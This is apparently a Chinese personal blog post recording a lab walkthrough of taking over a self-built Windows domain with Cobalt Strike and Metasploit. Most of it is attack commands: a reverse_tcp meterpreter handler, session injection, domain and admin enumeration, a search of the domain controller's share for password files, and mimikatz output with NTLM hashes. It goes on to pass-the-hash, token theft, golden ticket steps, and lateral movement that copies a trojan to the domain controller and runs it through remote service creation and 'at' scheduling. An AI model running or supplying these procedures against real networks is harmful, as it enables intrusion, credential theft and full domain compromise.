categories:
- 知識積累
top: FALSE
copyright: true
abbrlink: 1643719980
date: '2021-8-7 12:00:00'
description:1400x780
tags:
- 內網滲透
- 提權
- 滲透測試
- 黑客工具
photos: https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.png
前言
- Cobalt Strike的基礎使用,自建的域控,就一臺用
搭建好了域控機
目標:
1、一臺2008R2的DC 192.168.136.133
2、一臺2003 server的域內機器 192.168.136.136
3、一臺2008R2的B2 192.168.136.138
內網滲透拿域控
kali 192.168.1.104
一、cs上線
①直接用web傳遞發現失效了,原因是2003居然沒有powershell,那就傳馬,由于cs馬傳上去無法運行,所以就用msf馬監聽拿到shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
run
②接著就將會話轉給cs
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 80
run
二、cs派生會話
首先把它派生會話smb,可以繞防火墻
三、cs的命令使用以及信息收集
1、查看當前用戶組
shell whoami/groups
2、查看域
shell net view /domain
3、枚舉域內主機
shell net view /domain:GYLQ
4、查看DC的ip
shell ping WIN-NQ8TV3JGSN1
接著我發現2003機子太low了,再添加一個2008的機子域內機子繼續下面的測試,直接web傳遞,可以直接上線,server2008
5、查看域內成員
shell net group "domain Computers" /domain
6、查看DC域控主機
shell net group "domain Controllers" /domain
shell nltest/dclist:GYLQ #也可以
7、查看域的信任關系
shell nltest /domain_trusts
8、導入了powershell的模塊powerview.ps1的使用
powershell Invoke-ShareFinder #查看共享的
9、cs的列舉域控命令
net dclist
net dclist /domain
10、列出共享cs命令
net share \\B1
11、判斷是否能訪問域控機的C盤,所以是域超級管理員
shell dir \\WIN-NQ8TV3JGSN1\C$
12、查看域內的管理員
shell net group "enterprise admins" /domain
13、域內的超級管理員
shell net group "domain admins" /domain
14、查看域內組中的超級管理員
shell net localgroup "administrators" /domain
15、cs中的查看管理員組的信息
net group \\WIN-NQ8TV3JGSN1
16、查看遠程的DC的管理員用戶
net localgroup \\WIN-NQ8TV3JGSN1 administrators
17、powerview模塊的命令查看用戶
powershell Get-NetLocalGroup -HostName WIN-NQ8TV3JGSN1
18、單靠命令搜索用戶,或者信息收集
1、查看登陸過的用戶
shell dir /S /B \\WIN-NQ8TV3JGSN1\C$\users
2、查看敏感文件
shell dir /S /B \\WIN-NQ8TV3JGSN1\C$\"*pass*" "*user*" "*config*" "username.*" "password.*"
3、winrm執行powershell
列舉C盤目錄
powershell Invoke-Command -ComputerName WIN-NQ8TV3JGSN1 -ScriptBlock{ dir c:\}
19、通過mimikatz抓取主域的NTLM
msv :
[00000003] Primary
* Username : B1$
* Domain : GYLQ
* NTLM : ccf1ceaea1d47a0948e5022bd4d7ae64
* SHA1 : 0ea509056cd0d8ab09f6deeec8ba2db643bae89e
四、內網登陸認證
1、制作token訪問域控
steal_token 2688 域控的超級管理員pID
rev2self 恢復原來的令牌
就可以訪問域控的盤符
2、制作令牌
3、hash認證
pth GYLQ\Administrator 285deb0940e1630b59d2cd9590fcbc91
五、黃金票據
需要:用戶、域名、域id krbtgt的hash
1、查看當前黃金票據
shell klist
2、獲取域SID
shell whoami/user
用戶名 SID
================ ===========================================
b1\administrator S-1-5-21-204603982-2387576990-164658498-500
3、清除當前票據
kerberos_ticket_purge
六、內網橫向滲透獲取權限
方法一
1、生成一個服務木馬為test.exe
然后上傳到windows/users/administrator里面
2、將其復制到域控機內的temp中的命令,然后命名為a1.exe
shell copy C:\Users\administrator\test.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a1.exe
3、然后創建一個服務為a1
shell sc \\WIN-NQ8TV3JGSN1 create a1 binpath= c:\windows\temp\a1.exe
4、接著執行剛剛創建的服務a1
shell sc \\WIN-NQ8TV3JGSN1 start a1
5、接著域控的機子上線CS的system權限
方法二
這次會比較簡單一些,就是定時執行文件
還是創建一個木馬
1、然后保存為a2.exe,按照上面同樣的命令復制到域控機內
shell copy C:\Users\administrator\a2.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a2.exe
查看是否上傳成功
shell dir \\WIN-NQ8TV3JGSN1\C\windows\temp
2、查看域控當前時間
shell net time \\WIN-NQ8TV3JGSN1
3、接著利用at來創建一個一分鐘執行木馬的計劃
shell at \\WIN-NQ8TV3JGSN1 12:58:39 C:\windows\temp\a2.exe
cs上線了
方法三
上面做了個總結,下面是域控機無法聯網的情況怎么辦
1、這是用中轉器來進行獲取域控
2、接著生成一個a3.exe木馬,返回beacon到剛剛創建的監聽器
3、將a3.exe木馬上傳到users\administrator目錄中
4、然后下面命令將木馬復制到域控機內
shell copy C:\Users\administrator\a3.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a3.exe
查看是否復制成功
shell dir \\WIN-NQ8TV3JGSN1\C$\windows\temp
5、查看當前時間和定時執行木馬
shell net time \\WIN-NQ8TV3JGSN1
shell at \\WIN-NQ8TV3JGSN1 13:27:43 C:\windows\temp\a3.exe
6、等到了我們定好的時間,不出網域控會smb形式上線
結果圖
我的個人博客
孤桜懶契:http://gylq.gitee.io